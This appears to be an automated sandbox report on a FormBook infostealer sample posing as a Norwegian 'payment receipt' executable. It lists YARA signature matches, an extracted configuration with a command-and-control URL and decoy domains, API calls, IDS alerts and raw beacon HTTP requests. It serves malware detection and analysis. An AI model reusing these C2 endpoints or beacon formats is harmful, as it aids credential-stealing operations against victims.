1.0.Betalingskvittering.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.Betalingskvittering.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
0.2.Betalingskvittering.exe.f010000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Betalingskvittering.exe.f010000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Betalingskvittering.exe.f010000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.2.Betalingskvittering.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Betalingskvittering.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Betalingskvittering.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.2.Betalingskvittering.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Betalingskvittering.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Betalingskvittering.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.0.Betalingskvittering.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.Betalingskvittering.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.Betalingskvittering.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.0.Betalingskvittering.exe.400000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.Betalingskvittering.exe.400000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.Betalingskvittering.exe.400000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.0.Betalingskvittering.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.Betalingskvittering.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.Betalingskvittering.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: www.bbyyn10.xyz/b0us/	Avira URL Cloud: Label: phishing
Source: http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X	Avira URL Cloud: Label: phishing

Machine Learning detection for sample

Show sources

Source: Betalingskvittering.exe

Joe Sandbox ML: detected

Source: 1.0.Betalingskvittering.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 1.1.Betalingskvittering.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cmd.exe.295d8d0.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.Betalingskvittering.exe.400000.3.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Betalingskvittering.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Betalingskvittering.exe.400000.2.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.Betalingskvittering.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Betalingskvittering.exe.400000.1.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 7.2.cmd.exe.31b796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.Betalingskvittering.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Betalingskvittering.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004035EB GetEncryptedFileVersionExt,lstrcatA,lstrlenA,lstrcmpiA,GetFileAttributesA,LoadImageA,RegisterClassA,SystemParametersInfoA,CreateWindowExA,ShowWindow,GetClassInfoA,GetClassInfoA,GetClassInfoA,RegisterClassA,DialogBoxParamA,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00404F56 GetEncryptedFileVersionExt,OleInitialize,OleUninitialize,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00401000 DefWindowProcA,GetEncryptedFileVersionExt,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_0040140B GetEncryptedFileVersionExt,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00402836 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004047D3 GetDlgItem,GetDlgItem,GetDlgItem,SendMessageA,GetEncryptedFileVersionExt,GlobalAlloc,LoadBitmapA,SetWindowLongA,ImageList_Create,ImageList_AddMasked,SendMessageA,SendMessageA,SendMessageA,DeleteObject,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,SetWindowLongA,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ImageList_Destroy,GlobalFree,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004012E2 GetEncryptedFileVersionExt,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004058E6 GetShortPathNameA,CloseHandle,GetShortPathNameA,GetShortPathNameA,wsprintfA,GetEncryptedFileVersionExt,GetFileSize,GlobalAlloc,ReadFile,SetFilePointer,WriteFile,GlobalFree,CloseHandle,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00403F9C CheckDlgButton,GetDlgItem,SendMessageA,SendMessageA,GetEncryptedFileVersionExt,GetSysColor,SendMessageA,SendMessageA,lstrlenA,SendMessageA,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,LoadCursorA,LoadCursorA,SetCursor,SetCursor,ShellExecuteA,LoadCursorA,SetCursor,SendMessageA,SendMessageA,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004038B4 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,SetWindowTextA,

Source: Betalingskvittering.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe
Source:	Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe	Domain query: www.bbyyn10.xyz
Source: C:\Windows\explorer.exe	Domain query: www.chimichael.com
Source: C:\Windows\explorer.exe	Network Connect: 50.87.176.30 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.45.211 80
Source: C:\Windows\explorer.exe	Domain query: www.inkedbreadcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.malatirada.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe	Domain query: www.insularrofioa.xyz
Source: C:\Windows\explorer.exe	Domain query: www.bobazzing.com
Source: C:\Windows\explorer.exe	Network Connect: 35.186.238.101 80
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe	Network Connect: 142.4.98.67 80
Source: C:\Windows\explorer.exe	Domain query: www.finansresultation.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.40.182 80
Source: C:\Windows\explorer.exe	Domain query: www.improvfilmproduction.com
Source: C:\Windows\explorer.exe	Domain query: www.rxgmarket.com
Source: C:\Windows\explorer.exe	Domain query: www.joystoreworld.com
Source: C:\Windows\explorer.exe	Domain query: www.tucows.website
Source: C:\Windows\explorer.exe	Domain query: www.olympiaapartment.com

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: www.bbyyn10.xyz
Source: C:\Windows\explorer.exe	DNS query: www.insularrofioa.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.bbyyn10.xyz/b0us/

Source: Joe Sandbox View

ASN Name: AUTOMATTICUS AUTOMATTICUS

Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
